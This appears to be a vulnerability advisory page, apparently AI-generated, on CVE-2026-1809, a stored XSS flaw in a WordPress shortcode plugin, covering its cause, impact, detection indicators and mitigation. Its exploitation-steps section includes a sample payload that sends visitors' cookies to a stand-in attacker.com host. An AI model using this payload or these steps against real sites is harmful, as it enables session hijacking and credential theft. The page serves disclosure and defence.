CVE-2026-1809
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-1809 is a Stored Cross-Site Scripting (XSS) vulnerability in the HTML Tag Shortcodes plugin for WordPress, affecting all versions up to and including 1.1. The flaw arises from insufficient input sanitization and output escaping on user-supplied shortcode attributes, allowing authenticated attackers with contributor-level access or higher to inject arbitrary web scripts into pages. The vulnerability was published on February 11, 2026, and carries a CVSS v3.1 base score of 6.4 (Medium) (RedHat CVE, Wordfence).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The plugin fails to properly sanitize or escape user-supplied attributes passed to its shortcodes before rendering them in HTML output, enabling persistent script injection. An attacker with at least contributor-level WordPress access can craft a malicious shortcode attribute containing JavaScript, which is then stored in the database and executed in the browser of any user who visits the affected page. No special configuration or elevated privileges beyond contributor access are required (RedHat CVE, Wordfence).

Impact

Successful exploitation allows injected scripts to execute in the context of any visitor's browser session on affected pages, potentially leading to session hijacking, credential theft, unauthorized actions performed on behalf of victims, and defacement. The scope is changed (S:C), meaning the impact extends beyond the attacker's privilege level to affect other users. Confidentiality and integrity are both impacted at a low level, while availability is not directly affected (RedHat CVE).

Exploitability

No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported as of the available data. The EPSS score is approximately 0.032%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires authenticated access at the contributor level or above, which limits the attack surface compared to unauthenticated vulnerabilities (RedHat CVE, Wordfence).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the HTML Tag Shortcodes plugin version 1.1 or earlier, using tools like WPScan or by inspecting page source for plugin indicators.
  2. Obtain contributor access: Register or compromise an account with at least contributor-level privileges on the target WordPress site.
  3. Craft malicious shortcode: Create or edit a post/page using the plugin's shortcodes, injecting a malicious JavaScript payload into a shortcode attribute (e.g., [html_tag attr=""><script>document.location='https://attacker.com/steal?c='+document.cookie</script>"]).
  4. Publish or save content: Submit the post/page for review or publish it, causing the malicious payload to be stored in the WordPress database.
  5. Trigger execution: When any user (including administrators) visits the page containing the injected shortcode, the malicious script executes in their browser, enabling session hijacking, credential theft, or further attacks (RedHat CVE, Wordfence).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to wp-admin/post.php or REST API endpoints from contributor-level accounts containing suspicious shortcode attributes with encoded JavaScript (e.g., <script>, javascript:, onerror=, onload=).
  • Database: Unexpected JavaScript or HTML event handler content stored in wp_posts or wp_postmeta tables within shortcode markup.
  • Network: Outbound requests from victim browsers to unknown external domains shortly after visiting pages containing the plugin's shortcodes, potentially indicating cookie or credential exfiltration.
  • File System: No direct file system artifacts expected for stored XSS; however, monitor for new or modified plugin files in wp-content/plugins/html-tag-shortcodes/ that may indicate plugin tampering.

Mitigation and workarounds

As of the disclosure date, no patched version beyond 1.1 was confirmed available. Site administrators should immediately disable or remove the HTML Tag Shortcodes plugin until a patched version is released. Additionally, restrict contributor-level user registrations and review existing contributor accounts for suspicious content. Implementing a Web Application Firewall (WAF) with XSS filtering rules (e.g., Wordfence, Cloudflare) can provide interim protection (Wordfence, RedHat CVE).

Community reactions

Wordfence included this vulnerability in their weekly WordPress vulnerability report for February 9–15, 2026, highlighting it as part of a broader set of plugin-level XSS issues affecting the WordPress ecosystem (Wordfence). Spanish national cybersecurity agencies INCIBE-CERT and CCN-CERT also published early alerts referencing the CVE, reflecting standard coordinated disclosure practices in the European security community (INCIBE-CERT). No significant social media controversy or notable researcher commentary beyond routine disclosure coverage has been observed.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-16145HIGH7.2
  • gdpr-compliant-recaptcha-for-all-forms
NoYesAug 15, 2026
CVE-2026-18387MEDIUM6.5
  • groundhogg
NoYesAug 15, 2026
CVE-2026-16586MEDIUM6.5
  • contest-gallery
NoYesAug 15, 2026
CVE-2026-17090MEDIUM6.4
  • beaver-builder-lite-version
NoYesAug 15, 2026
CVE-2026-16146MEDIUM4.9
  • gdpr-compliant-recaptcha-for-all-forms
NoYesAug 15, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management